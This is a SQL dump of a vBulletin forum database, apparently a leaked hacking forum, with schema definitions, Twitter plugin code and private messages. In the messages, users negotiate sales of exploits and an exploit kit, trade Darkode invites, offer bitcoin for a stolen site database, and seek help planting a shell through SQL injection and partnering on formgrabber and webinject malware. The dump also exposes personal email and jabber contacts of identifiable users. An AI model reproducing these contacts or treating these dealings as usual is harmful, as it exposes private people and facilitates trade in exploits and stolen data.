('cpusergroup', 'Control Panel User Groups', 3, '', 0),
('cron', 'Scheduled Tasks', 3, '', 0),
('diagnostic', 'Diagnostic Tools', 3, '', 0),
('emailbody', 'Email Body Text', 10, '', 1),
('emailsubject', 'Email Subject Text', 3, '', 1),
('error', 'Error Messages', 8, '', 1),
('faqtext', 'FAQ Text', 10, '', 1),
('faqtitle', 'FAQ Title', 3, '', 1),
('forum', 'Forum-Related', 3, '', 0),
('forumdisplay', 'Forum Display', 3, '', 0),
('fronthelp', 'Frontend FAQ/Help', 3, '', 0),
('frontredirect', 'Front-End Redirect Messages', 8, '', 1),
('global', 'GLOBAL', 3, '', 0),
('help_faq', 'FAQ / Help Management', 3, '', 0),
('holiday', 'Holidays', 3, '', 0),
('hvquestion', 'Human Verification Questions', 3, '', 1),
('infraction', 'User Infractions', 3, '', 0),
('infractionlevel', 'User Infraction Levels', 3, '', 0),
('inlinemod', 'Inline Moderation', 3, '', 0),
('language', 'Language Tools', 3, '', 0),
('logging', 'Logging Tools', 3, '', 0),
('maintenance', 'Maintenance Tools', 3, '', 0),
('messaging', 'Messaging', 3, '', 0),
('moderator', 'Moderators', 3, '', 0),
('notice', 'Notices', 3, '', 0),
('plugins', 'Plugin System', 3, '', 0),
('pm', 'Private Messaging', 3, '', 0),
('poll', 'Polls', 3, '', 0),
('postbit', 'Postbit', 3, '', 0),
('posting', 'Posting', 3, '', 0),
('prefix', 'Thread Prefixes', 3, '', 0),
('prefixadmin', 'Thread Prefixes (Admin)', 3, '', 0),
('profilefield', 'Profile Field Tools', 3, '', 0),
('promotion', 'Promotion Tools', 3, '', 0),
('register', 'Register', 3, '', 0),
('reputation', 'Reputation', 3, '', 0),
('reputationlevel', 'Reputation Levels', 3, '', 0),
('search', 'Searching', 3, '', 0),
('showthread', 'Show Thread', 3, '', 0),
('socialgroups', 'Social Groups', 3, '', 0),
('sql', 'SQL Tools', 3, '', 0),
('stats', 'Statistics Tools', 3, '', 0),
('style', 'Style Tools', 3, '', 0),
('subscription', 'Subscription Tools', 3, '', 0),
('thread', 'Thread Tools', 3, '', 0),
('threadmanage', 'Thread Management', 3, '', 0),
('timezone', 'Timezones', 3, '', 0),
('user', 'User Tools (global)', 3, '', 0),
('vbsettings', 'vBulletin Settings', 4, '', 1),
('wol', 'Who\'s Online', 3, '', 0);
DROP TABLE IF EXISTS `picture`;
CREATE TABLE `picture` (
`pictureid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`caption` text,
`extension` varchar(20) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT '',
`filedata` mediumblob,
`filesize` int(10) unsigned NOT NULL DEFAULT '0',
`width` smallint(5) unsigned NOT NULL DEFAULT '0',
`height` smallint(5) unsigned NOT NULL DEFAULT '0',
`thumbnail` mediumblob,
`thumbnail_filesize` int(10) unsigned NOT NULL DEFAULT '0',
`thumbnail_width` smallint(5) unsigned NOT NULL DEFAULT '0',
`thumbnail_height` smallint(5) unsigned NOT NULL DEFAULT '0',
`thumbnail_dateline` int(10) unsigned NOT NULL DEFAULT '0',
`idhash` varchar(32) NOT NULL DEFAULT '',
`reportthreadid` int(10) unsigned NOT NULL DEFAULT '0',
`state` enum('visible','moderation') NOT NULL DEFAULT 'visible',
PRIMARY KEY (`pictureid`),
KEY `userid` (`userid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `picturecomment`;
CREATE TABLE `picturecomment` (
`commentid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`pictureid` int(10) unsigned NOT NULL DEFAULT '0',
`postuserid` int(10) unsigned NOT NULL DEFAULT '0',
`postusername` varchar(100) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`state` enum('visible','moderation','deleted') NOT NULL DEFAULT 'visible',
`title` varchar(255) NOT NULL DEFAULT '',
`pagetext` mediumtext,
`ipaddress` int(10) unsigned NOT NULL DEFAULT '0',
`allowsmilie` smallint(6) NOT NULL DEFAULT '1',
`reportthreadid` int(10) unsigned NOT NULL DEFAULT '0',
`messageread` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`commentid`),
KEY `pictureid` (`pictureid`,`dateline`,`state`),
KEY `postuserid` (`postuserid`,`pictureid`,`state`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `picturecomment_hash`;
CREATE TABLE `picturecomment_hash` (
`postuserid` int(10) unsigned NOT NULL DEFAULT '0',
`pictureid` int(10) unsigned NOT NULL DEFAULT '0',
`dupehash` varchar(32) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
KEY `postuserid` (`postuserid`,`dupehash`),
KEY `dateline` (`dateline`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `plugin`;
CREATE TABLE `plugin` (
`pluginid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(250) NOT NULL DEFAULT '',
`hookname` varchar(250) NOT NULL DEFAULT '',
`phpcode` text,
`product` varchar(25) NOT NULL DEFAULT '',
`devkey` varchar(25) NOT NULL DEFAULT '',
`active` smallint(6) NOT NULL DEFAULT '0',
`executionorder` smallint(5) unsigned NOT NULL DEFAULT '5',
PRIMARY KEY (`pluginid`),
KEY `active` (`active`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `plugin` (`pluginid`, `title`, `hookname`, `phpcode`, `product`, `devkey`, `active`, `executionorder`) VALUES
(1, 'Cache Template', 'cache_templates', 'if (THIS_SCRIPT == \'profile\')\r\n{\r\n $globaltemplates[] = \'modifyoptions_vbtwitter\';\r\n}', 'kk_vbtwitter', '', 1, 5),
(2, 'Add \"Tweet this Post!\"', 'postbit_display_complete', '$twitter_find = \'\';\r\n$twitter_add = \'
$vbphrase[twitter_post] \';\r\n\r\nif(strstr($this->registry->templatecache[\'postbit\'], $twitter_add) === false)\r\n{\r\n $this->registry->templatecache[\'postbit\'] = str_replace($twitter_find, $twitter_find . $twitter_add, $this->registry->templatecache[\'postbit\']);\r\n}\r\n\r\nif(strstr($this->registry->templatecache[\'postbit_legacy\'], $twitter_add) === false)\r\n{\r\n $this->registry->templatecache[\'postbit_legacy\'] = str_replace($twitter_find, $twitter_find . $twitter_add, $this->registry->templatecache[\'postbit_legacy\']);\r\n}', 'kk_vbtwitter', '', 1, 5),
(3, 'Add Twitter Set Up', 'profile_editoptions_start', '// Add the template\r\neval(\"\\$template_hook[usercp_options_other] .= \\\"\" . fetch_template(\'modifyoptions_vbtwitter\') . \"\\\";\");', 'kk_vbtwitter', '', 1, 5),
(4, 'Add \"Tweet this Thread!\"', 'showthread_complete', '$twitter_find = \'
\r\n $vbphrase[thread_tools] \r\n \';\r\n$twitter_add = \'
\r\n \r\n \';\r\n\r\n$vbulletin->templatecache[\'SHOWTHREAD\'] = str_replace($twitter_find, $twitter_find . $twitter_add, $vbulletin->templatecache[\'SHOWTHREAD\']);', 'kk_vbtwitter', '', 1, 5),
(5, 'Integrate into User Datamanager.', 'userdata_start', '$this->validfields[\'oauth_token\'] = array(TYPE_STR, REQ_NO);\r\n$this->validfields[\'oauth_token_secret\'] = array(TYPE_STR, REQ_NO);', 'kk_vbtwitter', '', 1, 5);
DROP TABLE IF EXISTS `pm`;
CREATE TABLE `pm` (
`pmid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`pmtextid` int(10) unsigned NOT NULL DEFAULT '0',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`folderid` smallint(6) NOT NULL DEFAULT '0',
`messageread` smallint(5) unsigned NOT NULL DEFAULT '0',
`parentpmid` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`pmid`),
KEY `pmtextid` (`pmtextid`),
KEY `userid` (`userid`,`folderid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `pm` (`pmid`, `pmtextid`, `userid`, `folderid`, `messageread`, `parentpmid`) VALUES
(1, 1, 1, 0, 2, 0),
(2, 1, 45, -1, 1, 1),
(3, 2, 45, 0, 1, 1),
(4, 3, 45, 0, 1, 1),
(5, 4, 1, 0, 2, 0),
(6, 4, 40, -1, 1, 5),
(7, 5, 40, 0, 1, 5),
(8, 6, 135, 0, 1, 0),
(9, 6, 13, -1, 1, 8),
(10, 7, 13, 0, 2, 0),
(11, 7, 39, -1, 1, 10),
(12, 8, 39, 0, 1, 10),
(13, 8, 13, -1, 1, 10),
(14, 9, 135, 0, 2, 0),
(15, 9, 13, -1, 1, 14),
(16, 10, 13, 0, 2, 14),
(17, 10, 135, -1, 1, 14),
(18, 11, 135, 0, 1, 14),
(19, 11, 13, -1, 1, 14),
(20, 12, 172, 0, 2, 0),
(21, 12, 170, -1, 1, 20),
(22, 13, 170, 0, 1, 20),
(23, 13, 172, -1, 1, 20),
(24, 14, 171, 0, 2, 0),
(25, 14, 170, -1, 1, 24),
(26, 15, 170, 0, 1, 24),
(27, 15, 171, -1, 1, 24),
(28, 16, 170, 0, 1, 20),
(29, 16, 172, -1, 1, 20),
(30, 17, 1, 0, 1, 0),
(31, 17, 170, -1, 1, 30),
(32, 18, 100, 0, 3, 0),
(33, 18, 165, -1, 1, 32),
(34, 19, 165, 0, 1, 32),
(35, 20, 171, 0, 1, 0),
(36, 20, 39, -1, 1, 35),
(37, 21, 171, 0, 2, 0),
(38, 21, 39, -1, 1, 37),
(39, 22, 164, 0, 2, 0),
(40, 22, 175, -1, 1, 39),
(41, 23, 175, 0, 2, 39),
(42, 23, 164, -1, 1, 39),
(43, 24, 164, 0, 1, 39),
(44, 24, 175, -1, 1, 39),
(45, 25, 39, 0, 1, 37),
(46, 25, 171, -1, 1, 37),
(47, 26, 13, 0, 1, 0),
(48, 27, 183, 0, 0, 0),
(49, 27, 13, -1, 1, 48),
(50, 28, 172, 0, 1, 0),
(51, 28, 13, -1, 1, 50),
(52, 29, 41, 0, 1, 0),
(53, 30, 178, 0, 2, 0),
(54, 30, 13, -1, 1, 53),
(55, 31, 178, 0, 1, 0),
(56, 31, 171, -1, 1, 55),
(57, 32, 13, 0, 2, 53),
(58, 32, 178, -1, 2, 53),
(59, 33, 178, 0, 1, 53),
(60, 33, 178, -1, 1, 53),
(61, 34, 178, 0, 2, 53),
(62, 34, 13, -1, 1, 53),
(63, 35, 13, 0, 2, 53),
(64, 35, 178, -1, 1, 53),
(65, 36, 100, 0, 2, 0),
(66, 36, 289, -1, 1, 65),
(67, 37, 289, 0, 1, 65),
(68, 38, 13, 0, 1, 0),
(69, 38, 33, -1, 1, 68),
(70, 39, 13, 0, 1, 0),
(71, 39, 178, -1, 1, 70),
(72, 40, 100, 0, 1, 0),
(73, 40, 323, -1, 1, 72),
(74, 41, 100, 0, 2, 0),
(75, 41, 278, -1, 1, 74),
(76, 42, 278, 0, 1, 74),
(77, 43, 278, 0, 2, 74),
(78, 44, 100, 0, 2, 74),
(79, 44, 278, -1, 1, 74),
(80, 45, 278, 0, 1, 74),
(81, 46, 100, 0, 1, 0),
(82, 46, 304, -1, 1, 81),
(83, 47, 100, 0, 1, 0),
(84, 47, 304, -1, 1, 83),
(85, 48, 171, 0, 2, 0),
(86, 48, 306, -1, 1, 85),
(87, 49, 306, 0, 1, 85),
(88, 49, 171, -1, 1, 85),
(89, 50, 100, 0, 1, 0),
(90, 50, 306, -1, 1, 89),
(91, 51, 308, 0, 1, 0),
(92, 51, 33, -1, 1, 91),
(93, 52, 178, 0, 1, 53),
(94, 52, 13, -1, 1, 53),
(95, 53, 173, 0, 2, 0),
(96, 53, 13, -1, 1, 95),
(97, 54, 13, 0, 1, 95),
(98, 55, 383, 0, 2, 0),
(99, 56, 343, 0, 1, 0),
(100, 56, 383, -1, 1, 99),
(101, 57, 100, 0, 1, 98),
(102, 57, 383, -1, 1, 98),
(103, 58, 173, 0, 2, 0),
(104, 58, 383, -1, 1, 103),
(105, 59, 100, 0, 1, 0),
(106, 59, 383, -1, 1, 105),
(107, 60, 284, 0, 1, 0),
(108, 60, 13, -1, 1, 107),
(109, 61, 383, 0, 1, 103),
(110, 62, 100, 0, 2, 0),
(111, 62, 383, -1, 1, 110),
(112, 63, 383, 0, 1, 110),
(113, 64, 383, 0, 1, 110),
(114, 65, 100, 0, 1, 0),
(115, 65, 383, -1, 1, 114),
(116, 66, 383, 0, 2, 103),
(117, 67, 173, 0, 2, 103),
(118, 67, 383, -1, 1, 103),
(119, 68, 100, 0, 2, 0),
(120, 68, 383, -1, 1, 119),
(121, 69, 383, 0, 1, 103),
(123, 70, 304, -1, 1, 122),
(124, 71, 383, 0, 1, 119),
(125, 72, 383, 0, 1, 119),
(126, 73, 305, 0, 0, 0),
(127, 73, 178, -1, 1, 126),
(129, 74, 383, -1, 1, 128),
(130, 75, 383, 0, 1, 128),
(131, 76, 383, 0, 1, 128),
(132, 77, 383, 0, 1, 128),
(133, 78, 383, 0, 1, 128),
(134, 79, 383, 0, 1, 128),
(135, 80, 383, 0, 1, 128),
(136, 81, 1, 0, 1, 0),
(137, 81, 304, -1, 1, 136),
(139, 82, 383, -1, 1, 138),
(141, 83, 383, -1, 1, 140),
(142, 84, 383, 0, 1, 140),
(143, 85, 135, 0, 1, 0),
(144, 85, 386, -1, 1, 143),
(145, 86, 387, 0, 0, 0),
(146, 87, 387, 0, 0, 0),
(147, 88, 387, 0, 0, 0),
(148, 89, 383, 0, 0, 103),
(149, 90, 172, 0, 0, 0),
(150, 90, 196, -1, 1, 149),
(151, 91, 1, 0, 0, 0),
(152, 91, 166, -1, 1, 151);
DROP TABLE IF EXISTS `pmreceipt`;
CREATE TABLE `pmreceipt` (
`pmid` int(10) unsigned NOT NULL DEFAULT '0',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`touserid` int(10) unsigned NOT NULL DEFAULT '0',
`tousername` varchar(100) NOT NULL DEFAULT '',
`title` varchar(250) NOT NULL DEFAULT '',
`sendtime` int(10) unsigned NOT NULL DEFAULT '0',
`readtime` int(10) unsigned NOT NULL DEFAULT '0',
`denied` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`pmid`),
KEY `userid` (`userid`,`readtime`),
KEY `touserid` (`touserid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `pmtext`;
CREATE TABLE `pmtext` (
`pmtextid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`fromuserid` int(10) unsigned NOT NULL DEFAULT '0',
`fromusername` varchar(100) NOT NULL DEFAULT '',
`title` varchar(250) NOT NULL DEFAULT '',
`message` mediumtext,
`touserarray` mediumtext,
`iconid` smallint(5) unsigned NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`showsignature` smallint(5) unsigned NOT NULL DEFAULT '0',
`allowsmilie` smallint(5) unsigned NOT NULL DEFAULT '1',
`reportthreadid` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`pmtextid`),
KEY `fromuserid` (`fromuserid`,`dateline`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `pmtext` (`pmtextid`, `fromuserid`, `fromusername`, `title`, `message`, `touserarray`, `iconid`, `dateline`, `showsignature`, `allowsmilie`, `reportthreadid`) VALUES
(1, 45, 'unlog', 'hi', 'Я смотрю возвращаетесь потихоньку :)\r\n\r\nКакие планы?\r\n\r\nPS: \r\nС кодировкой чет беда, Вы бы восстановили пока никто ничего особо не писал на форум:)\r\n\r\nОпять чекер забыли удалить: _https://w0rm.in/validator.php', 'a:1:{s:2:\"cc\";a:1:{i:1;s:5:\"admin\";}}', 0, 1421152783, 0, 1, 0),
(2, 1, 'admin', 'Re: hi', '[QUOTE=unlog]Я смотрю возвращаетесь потихоньку :)\n\nКакие планы?\n\nPS: \nС кодировкой чет беда, Вы бы восстановили пока никто ничего особо не писал на форум:)\n\nОпять чекер забыли удалить: _https://w0rm.in/validator.php[/QUOTE]', 'a:1:{s:2:\"cc\";a:1:{i:45;s:5:\"unlog\";}}', 0, 1421155246, 1, 1, 0),
(3, 1, 'admin', 'Re: hi', 'потер, спасибо) зацди в жаббер : [email]w0rm@cih.ms[/email]', 'a:1:{s:2:\"cc\";a:1:{i:45;s:5:\"unlog\";}}', 0, 1421155277, 1, 1, 0),
(4, 40, 'opensc', 'привет', 'привет ты очень занят или слился?)', 'a:1:{s:2:\"cc\";a:1:{i:1;s:5:\"admin\";}}', 0, 1421926718, 0, 1, 0),
(5, 1, 'admin', 'Re: привет', '[QUOTE=opensc]привет ты очень занят или слился?)[/QUOTE]\r\nконтакт пришлось сменить внезпно, [email]root@w0rm.in[/email]', 'a:1:{s:2:\"cc\";a:1:{i:40;s:6:\"opensc\";}}', 0, 1421933887, 1, 1, 0),
(6, 13, 'syslink', 'CVE-2014-6369', 'do you still want to buy?', 'a:1:{s:2:\"cc\";a:1:{i:135;s:10:\"reversing4\";}}', 0, 1425936899, 0, 1, 0),
(7, 39, 'lumbricus', 'hoi', 'where is w0rm do you have jabb?', 'a:1:{s:2:\"cc\";a:1:{i:13;s:7:\"syslink\";}}', 0, 1425968977, 0, 1, 0),
(8, 13, 'syslink', 'Re: hoi', '[QUOTE=lumbricus]where is w0rm do you have jabb?[/QUOTE]\r\n\r\n[email]w0rm@cih.ms[/email]', 'a:1:{s:2:\"cc\";a:1:{i:39;s:9:\"lumbricus\";}}', 0, 1426458053, 1, 1, 0),
(9, 13, 'syslink', 'exploit', 'still required?', 'a:1:{s:2:\"cc\";a:1:{i:135;s:10:\"reversing4\";}}', 0, 1426780048, 0, 1, 0),
(10, 135, 'reversing4', 'Re: exploit', '[QUOTE=syslink]still required?[/QUOTE]\r\n\r\nyes, do u have it?', 'a:1:{s:2:\"cc\";a:1:{i:13;s:7:\"syslink\";}}', 0, 1427622420, 1, 1, 0),
(11, 13, 'syslink', 'Re: exploit', '[QUOTE=reversing4][QUOTE=syslink]still required?[/QUOTE]\r\n\r\nyes, do u have it?[/QUOTE]\r\nyes', 'a:1:{s:2:\"cc\";a:1:{i:135;s:10:\"reversing4\";}}', 0, 1431166706, 1, 1, 0),
(12, 170, 'Guest', 'hi', 'What is your jabber ?>', 'a:1:{s:2:\"cc\";a:1:{i:172;s:17:\"hunter_exploitkit\";}}', 0, 1439294885, 1, 1, 0),
(13, 172, 'hunter_exploitkit', 'Re: hi', '[QUOTE=Guest]What is your jabber ?>[/QUOTE]\r\n\r\nHI Bro\r\n[email]exploitkit@jabb3r.org[/email]', 'a:1:{s:2:\"cc\";a:1:{i:170;s:5:\"Guest\";}}', 0, 1439312536, 0, 1, 0),
(14, 170, 'Guest', 'hi', 'hi\r\nwhat is your jabber', 'a:1:{s:2:\"cc\";a:1:{i:171;s:5:\"st1x0\";}}', 0, 1439385092, 1, 1, 0),
(15, 171, 'st1x0', 'Re: hi', '[QUOTE=Guest]hi\r\nwhat is your jabber[/QUOTE]\r\nhi\r\n[email]st1x0@exploit.im[/email]', 'a:1:{s:2:\"cc\";a:1:{i:170;s:5:\"Guest\";}}', 0, 1439393894, 1, 1, 0),
(16, 172, 'hunter_exploitkit', 'Re: hi', '[QUOTE=Guest]What is your jabber ?>[/QUOTE]\r\n[email]exploitkit@jabb3r.org[/email]', 'a:1:{s:2:\"cc\";a:1:{i:170;s:5:\"Guest\";}}', 0, 1439468983, 0, 1, 0),
(17, 170, 'Guest', 'hi', 'hi bro\r\ndo you have access rapidgator.net ?', 'a:1:{s:2:\"cc\";a:1:{i:1;s:5:\"admin\";}}', 0, 1439846354, 1, 1, 0),
(18, 165, 'Versus71', 'Перезалив', 'Здорово. Я тебя как-то просил, есть возможность это дело перезалить:\r\n[url]https://w0rm.ws/showpost.php?p=1019&postcount=2[/url]', 'a:1:{s:2:\"cc\";a:1:{i:100;s:4:\"w0rm\";}}', 0, 1440024506, 0, 1, 0),
(19, 100, 'w0rm', 'Re: Перезалив', '[QUOTE=Versus71]Здорово. Я тебя как-то просил, есть возможность это дело перезалить:\r\n[url]https://w0rm.ws/showpost.php?p=1019&postcount=2[/url][/QUOTE]\r\nпривет, чекай - помоему оно.\r\n[url]https://cloud.mail.ru/public/1f9b0d185bba/%D0%91%D0%B0%D0%B7%D1%8B%20%D0%A4%D0%BE%D1%80%D1%83%D0%BC%D0%BE%D0%B2.rar[/url]', 'a:1:{s:2:\"cc\";a:1:{i:165;s:8:\"Versus71\";}}', 0, 1440024854, 1, 1, 0),
(20, 39, 'lumbricus', 'JABBER', 'Hello, \r\n\r\nI\'d like to talk, may be worth your while. Can you use JABBER & OTR ?', 'a:1:{s:2:\"cc\";a:1:{i:171;s:5:\"st1x0\";}}', 0, 1440913776, 0, 1, 0),
(21, 39, 'lumbricus', 'JabberOTR', 'Hello do you have jabber? regarding exploit.', 'a:1:{s:2:\"cc\";a:1:{i:171;s:5:\"st1x0\";}}', 0, 1440913871, 0, 1, 0),
(22, 175, 'v0t3', 'about v0t3.com', 'Hi,\r\n\r\nI see you registered to my site v0t3.com :D', 'a:1:{s:2:\"cc\";a:1:{i:164;s:6:\"*Hash*\";}}', 0, 1441188694, 0, 1, 0),
(23, 164, '*Hash*', 'Re: about v0t3.com', '[QUOTE=v0t3]Hi,\r\n\r\nI see you registered to my site v0t3.com :D[/QUOTE]\r\n\r\nYou can add it in? )', 'a:1:{s:2:\"cc\";a:1:{i:175;s:4:\"v0t3\";}}', 0, 1441301514, 0, 1, 0),
(24, 175, 'v0t3', 'Re: about v0t3.com', '[QUOTE=*Hash*][QUOTE=v0t3]Hi,\r\n\r\nI see you registered to my site v0t3.com :D[/QUOTE]\r\n\r\nYou can add it in? )[/QUOTE]\r\n\r\nYess but you must have add v0t3 button to footer of your forum:) This is a ebmed code for your v0t3 button:\r\n\r\n[CODE]
[/CODE]', 'a:1:{s:2:\"cc\";a:1:{i:164;s:6:\"*Hash*\";}}', 0, 1441358634, 0, 1, 0),
(25, 171, 'st1x0', 'Re: JabberOTR', '[QUOTE=lumbricus]Hello do you have jabber? regarding exploit.[/QUOTE]\r\n[email]st1x0@exploit.im[/email]', 'a:1:{s:2:\"cc\";a:1:{i:39;s:9:\"lumbricus\";}}', 0, 1441884378, 1, 1, 0),
(26, 100, 'w0rm', 'hay)', 'ping me, [email]w0rm@cih.ms[/email]', 'a:1:{s:2:\"cc\";a:1:{i:13;s:7:\"syslink\";}}', 0, 1442831166, 0, 1, 0),
(27, 13, 'syslink', 'jabber', '[email]link3d@w0rm.ws[/email]', 'a:1:{s:2:\"cc\";a:1:{i:183;s:4:\"zoom\";}}', 0, 1443001571, 0, 1, 0),
(28, 13, 'syslink', 'hi', 'is your ek up and running?', 'a:1:{s:2:\"cc\";a:1:{i:172;s:17:\"hunter_exploitkit\";}}', 0, 1443001782, 0, 1, 0),
(29, 100, 'w0rm', 'Контакты', 'Стукни ко мне в жаббер пожалуста, [email]w0rm@cih.ms[/email]', 'a:1:{s:2:\"cc\";a:1:{i:41;s:3:\"123\";}}', 0, 1445792534, 0, 1, 0),
(30, 13, 'syslink', 'darkode invite', 'what do you offer for one?', 'a:1:{s:2:\"cc\";a:1:{i:178;s:7:\"dark001\";}}', 0, 1446586684, 0, 1, 0),
(31, 171, 'st1x0', 'HI', 'Hey, you can get an invite to the site? I was zaregan but after the incident, all is lost.', 'a:1:{s:2:\"cc\";a:1:{i:178;s:7:\"dark001\";}}', 0, 1446704783, 0, 1, 0),
(32, 178, 'dark001', 'Re: darkode invite', 'Are interested in getting BTC or information?', 'a:1:{s:2:\"cc\";a:1:{i:13;s:7:\"syslink\";}}', 0, 1446720288, 1, 1, 0),
(33, 178, 'dark001', 'Re: darkode invite', 'Are you interested in getting BTC or information?', 'a:1:{s:2:\"cc\";a:1:{i:178;s:7:\"dark001\";}}', 0, 1446720632, 1, 1, 0),
(34, 13, 'syslink', 'Re: darkode invite', '[QUOTE=dark001]Are interested in getting BTC or information?[/QUOTE]\r\njabber?', 'a:1:{s:2:\"cc\";a:1:{i:178;s:7:\"dark001\";}}', 0, 1446723944, 1, 1, 0),
(35, 178, 'dark001', 'Re: darkode invite', 'try my other jabber id [email]dark001@jabb3r.org[/email]\r\n\r\nwaiting to be in touch with you', 'a:1:{s:2:\"cc\";a:1:{i:13;s:7:\"syslink\";}}', 0, 1447160822, 1, 1, 0),
(36, 289, 'daily', 'Jabber Contact', 'Hello,\r\n\r\nWhat is your jabber?', 'a:1:{s:2:\"cc\";a:1:{i:100;s:4:\"w0rm\";}}', 0, 1447256587, 0, 1, 0),
(37, 100, 'w0rm', 'Re: Jabber Contact', '[QUOTE=daily]Hello,\r\n\r\nWhat is your jabber?[/QUOTE]\r\n\r\n[email]w0rm@cih.ms[/email]', 'a:1:{s:2:\"cc\";a:1:{i:289;s:5:\"daily\";}}', 0, 1447333578, 1, 1, 0),
(38, 33, 'ropertus', 'darkode invite', 'Do you have a spare invite my friend?', 'a:1:{s:2:\"cc\";a:1:{i:13;s:7:\"syslink\";}}', 0, 1448042465, 0, 1, 0),
(39, 178, 'dark001', 'Hi syslink', 'Hi Syslink\r\n\r\nI am coming back to you because I did not get any answer. I a wanted to be in touch with you on Jabber\r\nbut you did not contact me. Can you please be in touch with me regarding the Darkode invite so we can talk about an offer \r\n\r\nThanks \r\n\r\nJabber: [email]dark001@jabb3r.org[/email]\r\nmail: [email]dark001@sigaint.org[/email]', 'a:1:{s:2:\"cc\";a:1:{i:13;s:7:\"syslink\";}}', 0, 1448356427, 0, 1, 0),
(40, 323, 'foma9999', 'лада седан', 'Привет, *.lada продается еще?\r\nКуплю куплю!', 'a:1:{s:2:\"cc\";a:1:{i:100;s:4:\"w0rm\";}}', 0, 1449077763, 0, 1, 0),
(41, 278, 'pax01', 'cih', 'Hi w0rm:\r\n\r\none quest about cih.ms\r\n\r\nThis application are open ?', 'a:1:{s:2:\"cc\";a:1:{i:100;s:4:\"w0rm\";}}', 0, 1449757857, 0, 1, 0),
(42, 100, 'w0rm', 'Re: cih', '[QUOTE=pax01]Hi w0rm:\r\n\r\none quest about cih.ms\r\n\r\nThis application are open ?[/QUOTE]', 'a:1:{s:2:\"cc\";a:1:{i:278;s:5:\"pax01\";}}', 0, 1449761078, 1, 1, 0),
(43, 100, 'w0rm', 'Re: cih', '[QUOTE=pax01]Hi w0rm:\r\n\r\none quest about cih.ms\r\n\r\nThis application are open ?[/QUOTE]\r\n\r\nHi, didnt.', 'a:1:{s:2:\"cc\";a:1:{i:278;s:5:\"pax01\";}}', 0, 1449761099, 1, 1, 0),
(44, 278, 'pax01', 'Re: cih', '[QUOTE=w0rm][QUOTE=pax01]Hi w0rm:\r\n\r\none quest about cih.ms\r\n\r\nThis application are open ?[/QUOTE]\r\n\r\nHi, didnt.[/QUOTE]\r\n\r\nIs there any possibility to register?\r\n\r\nI have found the application form for the web. ([url]http://cih.ms/join/apps.php[/url])', 'a:1:{s:2:\"cc\";a:1:{i:100;s:4:\"w0rm\";}}', 0, 1449789601, 1, 1, 0),
(45, 100, 'w0rm', 'Re: cih', '[QUOTE=pax01][QUOTE=w0rm][QUOTE=pax01]Hi w0rm:\r\n\r\none quest about cih.ms\r\n\r\nThis application are open ?[/QUOTE]\r\n\r\nHi, didnt.[/QUOTE]\r\n\r\nIs there any possibility to register?\r\n\r\nI have found the application form for the web. ([url]http://cih.ms/join/apps.php[/url])[/QUOTE]\r\n\r\nu can try submit it, but it will be aprooved if u get recommendations.', 'a:1:{s:2:\"cc\";a:1:{i:278;s:5:\"pax01\";}}', 0, 1449848074, 1, 1, 0),
(46, 304, 'Kosmas', 'iCloud Bypass 0Day', 'ChiptuneXT sent me over. Let\'s talk details!\r\n\r\n\r\n-Kosmas', 'a:1:{s:2:\"cc\";a:1:{i:100;s:4:\"w0rm\";}}', 0, 1450059526, 0, 1, 0),
(47, 304, 'Kosmas', 'iCloud Bypass 0Day', 'ChiptuneXT sent me over. Let\'s talk details!\r\n\r\n\r\n[email]crzyfingers@gmail.com[/email]\r\n\r\n-Kosmas', 'a:1:{s:2:\"cc\";a:1:{i:100;s:4:\"w0rm\";}}', 0, 1450059588, 0, 1, 0),
(48, 306, 'ExEc_cOdE', 'Привет', 'Привет слушай не поможешь шелл залить через sql-in?', 'a:1:{s:2:\"cc\";a:1:{i:171;s:5:\"st1x0\";}}', 0, 1450246666, 0, 1, 0),
(49, 171, 'st1x0', 'Re: Привет', '[QUOTE=ExEc_cOdE]Привет слушай не поможешь шелл залить через sql-in?[/QUOTE]\r\nПривет какая пиши', 'a:1:{s:2:\"cc\";a:1:{i:306;s:9:\"ExEc_cOdE\";}}', 0, 1450301074, 1, 1, 0),
(50, 306, 'ExEc_cOdE', 'Привет', 'Привет ворм зайди в жаб, помощь твоя нужна', 'a:1:{s:2:\"cc\";a:1:{i:100;s:4:\"w0rm\";}}', 0, 1450463634, 0, 1, 0),
(51, 33, 'ropertus', 'gamevil.com', '200 euro BTC for db', 'a:1:{s:2:\"cc\";a:1:{i:308;s:6:\"Scrack\";}}', 0, 1452216370, 0, 1, 0),
(52, 13, 'syslink', 'Re: darkode invite', '[QUOTE=dark001]try my other jabber id [email]dark001@jabb3r.org[/email]\r\n\r\nwaiting to be in touch with you[/QUOTE]\r\nadded you bro', 'a:1:{s:2:\"cc\";a:1:{i:178;s:7:\"dark001\";}}', 0, 1452735565, 0, 1, 0),
(53, 13, 'syslink', 'C++', 'C++ formgraber + webinjects you can give more details on the partnership?', 'a:1:{s:2:\"cc\";a:1:{i:173;s:4:\"tdss\";}}', 0, 1453249456, 0, 1, 0),
